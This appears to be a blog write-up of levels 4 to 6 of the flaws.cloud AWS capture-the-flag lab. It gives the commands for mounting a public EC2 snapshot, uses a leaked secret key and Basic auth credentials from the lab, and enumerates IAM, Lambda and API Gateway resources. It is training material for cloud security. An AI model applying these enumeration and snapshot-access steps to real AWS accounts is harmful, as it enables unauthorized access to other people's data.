AWS Security(S3 buckets, ec2 snapshots, leaked AWS keys, permissions to read IAM policies) challenge

Challenge 4:


  • It asks for creds that we don’t have.
  • A snapshot of this instance was created after deploying.
  • Challenge is to access this ec2 instance.
  1. Snapshots- It is given that snapshot is created for this instance. Snapshots can be made public, which poses a huge risk.
aws --profile terraform  ec2 describe-snapshots --region us-west-2 --filters "Name=volume-size,Values=8" "Name=status,Values=completed" "Name=storage-tier,Values=standard" > us-west-2_8GiB_standardtier.txt
aws --profile flaws sts get-caller-identity
aws --profile terraform  ec2 describe-snapshots --owner-id 975426262029 --region us-west-2
aws --profile terraform ec2 create-volume --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89 --availability-zone us-west-2c
fdisk -l
mkdir /mnt/volume_ext
lsblk -f
mount -t ext4 /dev/xvdf1  /mnt/volume_ext
flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
Authorization: Basic Zmxhd3M6bkNQOHhpZ2RqcGp5aVhnSjduSnU3cnc1Um82OGlFOE0=

Challenge 5:

We are provided with a HTTP web proxy server that is running on an ec2 instance.<your website>/
"SecretAccessKey" : "oqzfuYcxUnzlDPiIU/LLrlvOUYseSzZCShqgLHK3",
aws --profile flaws_lvl5 s3 ls

Challenge 6:

We are provided with aws creds. It is specified SecurityAudit policy is attached to this account.

aws --profile flaws_lvl6 iam get-user
aws --profile flaws_lvl6 sts get-caller-identity
aws --profile flaws_lvl6 iam list-attached-user-policies --user-name Level6
aws --profile flaws_lvl6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
aws --profile flaws_lvl6 iam get-policy-version  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
aws --region us-west-2 --profile level6 lambda list-functions
  • restapi_id
  • region(we already know)
  • stage_name
aws --region us-west-2 --profile flaws_lvl6 lambda get-policy --function-name Level6
  • restapi_id: s33ppypa75
aws --profile flaws_lvl6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
  • stage_name: Prod



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback.